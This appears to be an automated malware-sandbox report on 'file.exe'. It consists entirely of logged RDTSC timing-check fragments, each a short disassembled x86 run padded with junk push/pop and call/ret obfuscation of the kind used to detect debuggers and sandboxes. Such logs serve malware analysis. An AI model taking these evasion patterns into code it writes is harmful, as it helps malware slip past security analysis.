              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A6E2B3 second address: A6E321 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 xor dword ptr [esp], 3FCE3DF6h 0x0000000e jng 00007F5444E6F4F8h 0x00000014 mov cl, 0Bh 0x00000016 push 00000003h 0x00000018 push ebx 0x00000019 pop esi 0x0000001a push 00000000h 0x0000001c mov di, bx 0x0000001f push 00000003h 0x00000021 mov cl, dl 0x00000023 push 9CB36E00h 0x00000028 push edi 0x00000029 jng 00007F5444E6F4FCh 0x0000002f jbe 00007F5444E6F4F6h 0x00000035 pop edi 0x00000036 xor dword ptr [esp], 5CB36E00h 0x0000003d or dword ptr [ebp+122D17D1h], esi 0x00000043 lea ebx, dword ptr [ebp+12451E01h] 0x00000049 pushad 0x0000004a jmp 00007F5444E6F4FFh 0x0000004f pushad 0x00000050 mov edi, dword ptr [ebp+122D2BD9h] 0x00000056 mov dword ptr [ebp+122D373Fh], edx 0x0000005c popad 0x0000005d popad 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 pushad 0x00000063 popad 0x00000064 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7FDE0 second address: A7FDE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E0DC second address: A8E0E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E63E second address: A8E658 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5444755FB5h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E8D9 second address: A8E8DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E8DD second address: A8E8E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E8E5 second address: A8E8FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F4FDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E8FD second address: A8E901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8EA7F second address: A8EA83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8EA83 second address: A8EA8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8EBD1 second address: A8EBD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8EFD7 second address: A8EFE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5444755FA6h 0x0000000a pop ebx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8EFE2 second address: A8EFEC instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5444E6F4FEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A522BD second address: A522C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A522C1 second address: A522C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A522C5 second address: A522D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F5444755FADh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8F12E second address: A8F15F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F5444E6F506h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F5444E6F505h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8F809 second address: A8F827 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5444755FACh 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5444755FAEh 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8FDB4 second address: A8FDBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8FDBA second address: A8FDDE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F5444755FB0h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A939D4 second address: A939D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9552A second address: A95530 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A95530 second address: A95540 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5444E6F4FCh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A95CCB second address: A95CD1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A96F9A second address: A96FA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F5444E6F4F6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9B088 second address: A9B08F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9B08F second address: A9B09B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9B209 second address: A9B20E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9B20E second address: A9B234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push esi 0x00000008 jmp 00007F5444E6F504h 0x0000000d pop esi 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9B6AF second address: A9B6C1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5444755FA8h 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007F5444755FA6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9B80B second address: A9B80F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9B80F second address: A9B821 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5444755FA8h 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007F5444755FA6h 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9B821 second address: A9B825 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9C2B6 second address: A9C300 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F5444755FB0h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jnp 00007F5444755FC0h 0x00000014 push edx 0x00000015 jmp 00007F5444755FB8h 0x0000001a pop edx 0x0000001b mov eax, dword ptr [eax] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 jns 00007F5444755FA6h 0x00000026 js 00007F5444755FA6h 0x0000002c popad 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9C300 second address: A9C326 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F5444E6F503h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007F5444E6F4F6h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9C326 second address: A9C3A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444755FAFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pop esi 0x0000000d popad 0x0000000e pop eax 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007F5444755FA8h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov esi, 74A248C5h 0x0000002e add dword ptr [ebp+122D2D12h], eax 0x00000034 call 00007F5444755FA9h 0x00000039 jmp 00007F5444755FB9h 0x0000003e push eax 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007F5444755FB8h 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9C3A8 second address: A9C3AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9C3AC second address: A9C3B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9C3B2 second address: A9C3D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5444E6F4FEh 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 je 00007F5444E6F4F6h 0x0000001a pop esi 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9C3D6 second address: A9C3E0 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5444755FACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9C3E0 second address: A9C401 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov eax, dword ptr [eax] 0x00000008 jmp 00007F5444E6F500h 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9C401 second address: A9C406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9C406 second address: A9C40B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9C9B4 second address: A9C9B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9C9B8 second address: A9C9CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F4FFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9C9CB second address: A9C9D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9C9D1 second address: A9C9D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9D1EA second address: A9D1EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9D5A4 second address: A9D5C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, dword ptr [ebp+122D3728h] 0x00000011 jo 00007F5444E6F4FCh 0x00000017 mov esi, dword ptr [ebp+122D2C65h] 0x0000001d xchg eax, ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 push edi 0x00000021 push edi 0x00000022 pop edi 0x00000023 pop edi 0x00000024 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9D5C8 second address: A9D5CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9D5CE second address: A9D5D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9E33C second address: A9E394 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444755FB2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a mov dword ptr [esp], eax 0x0000000d adc si, EFABh 0x00000012 push 00000000h 0x00000014 mov esi, 66D5C059h 0x00000019 call 00007F5444755FB4h 0x0000001e pushad 0x0000001f mov dl, 0Fh 0x00000021 xor bh, 0000007Fh 0x00000024 popad 0x00000025 pop edi 0x00000026 push 00000000h 0x00000028 jnc 00007F5444755FA6h 0x0000002e mov di, E3C1h 0x00000032 push eax 0x00000033 push esi 0x00000034 push eax 0x00000035 push edx 0x00000036 js 00007F5444755FA6h 0x0000003c rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9F3D2 second address: A9F3D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9F3D6 second address: A9F3DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9FF14 second address: A9FF25 instructions: 0x00000000 rdtsc 0x00000002 js 00007F5444E6F4F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9FF25 second address: A9FF2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA0A42 second address: AA0AC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444E6F4FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a nop 0x0000000b jmp 00007F5444E6F509h 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F5444E6F4F8h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007F5444E6F4F8h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 0000001Ah 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 jne 00007F5444E6F4FBh 0x0000004e push eax 0x0000004f push esi 0x00000050 jbe 00007F5444E6F4FCh 0x00000056 push eax 0x00000057 push edx 0x00000058 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA28C1 second address: AA28C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA5629 second address: AA562E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA5BCA second address: AA5C35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444755FAAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D36F5h], eax 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F5444755FA8h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e movsx ebx, dx 0x00000031 mov ebx, dword ptr [ebp+122D369Fh] 0x00000037 push 00000000h 0x00000039 xchg eax, esi 0x0000003a push ebx 0x0000003b jmp 00007F5444755FB6h 0x00000040 pop ebx 0x00000041 push eax 0x00000042 pushad 0x00000043 jno 00007F5444755FACh 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA5C35 second address: AA5C39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6D50 second address: AA6D54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: AA6D54 second address: AA6D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6D5A second address: AA6D64 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5444755FACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA7DE9 second address: AA7DEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA6F7B second address: AA6FF3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5444755FA8h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D358Bh] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a pushad 0x0000001b mov edi, edx 0x0000001d jmp 00007F5444755FAEh 0x00000022 popad 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a pushad 0x0000002b add eax, dword ptr [ebp+122D2929h] 0x00000031 jnc 00007F5444755FACh 0x00000037 popad 0x00000038 mov eax, dword ptr [ebp+122D0E75h] 0x0000003e push 00000000h 0x00000040 push edx 0x00000041 call 00007F5444755FA8h 0x00000046 pop edx 0x00000047 mov dword ptr [esp+04h], edx 0x0000004b add dword ptr [esp+04h], 00000014h 0x00000053 inc edx 0x00000054 push edx 0x00000055 ret 0x00000056 pop edx 0x00000057 ret 0x00000058 mov ebx, esi 0x0000005a push FFFFFFFFh 0x0000005c push eax 0x0000005d jc 00007F5444755FB0h 0x00000063 push eax 0x00000064 push edx 0x00000065 push ecx 0x00000066 pop ecx 0x00000067 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9E58 second address: AA9EDF instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5444E6F500h 0x00000008 jmp 00007F5444E6F4FAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007F5444E6F4F8h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000016h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a jmp 00007F5444E6F505h 0x0000002f jmp 00007F5444E6F4FDh 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007F5444E6F4F8h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 00000019h 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 cmc 0x00000051 push 00000000h 0x00000053 mov dword ptr [ebp+122D2CAEh], ebx 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AA9EDF second address: AA9EE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAAE6E second address: AAAE72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAAE72 second address: AAAE80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AABF0E second address: AABF14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAAFF8 second address: AAB015 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5444755FB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AABF14 second address: AABF1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAEBDC second address: AAEBF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5444755FB8h 0x00000009 popad 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AABF1A second address: AABF1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AACF5C second address: AACF66 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F5444755FACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AADD4A second address: AADD4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AABF1E second address: AABF32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jg 00007F5444755FA6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAB0D5 second address: AAB0FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F5444E6F507h 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AAEDD3 second address: AAEDD9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AADD4E second address: AADD54 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AABF32 second address: AABF37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AABF37 second address: AABF82 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F5444E6F4F8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+122D28F5h] 0x00000013 push dword ptr fs:[00000000h] 0x0000001a movsx edi, bx 0x0000001d mov dword ptr fs:[00000000h], esp 0x00000024 mov ebx, dword ptr [ebp+122D29EDh] 0x0000002a mov eax, dword ptr [ebp+122D05B5h] 0x00000030 jnc 00007F5444E6F4F9h 0x00000036 push FFFFFFFFh 0x00000038 pushad 0x00000039 movzx eax, cx 0x0000003c mov edi, dword ptr [ebp+122D2AE9h] 0x00000042 popad 0x00000043 push eax 0x00000044 push edi 0x00000045 push ebx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: AB2AEE second address: AB2AF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
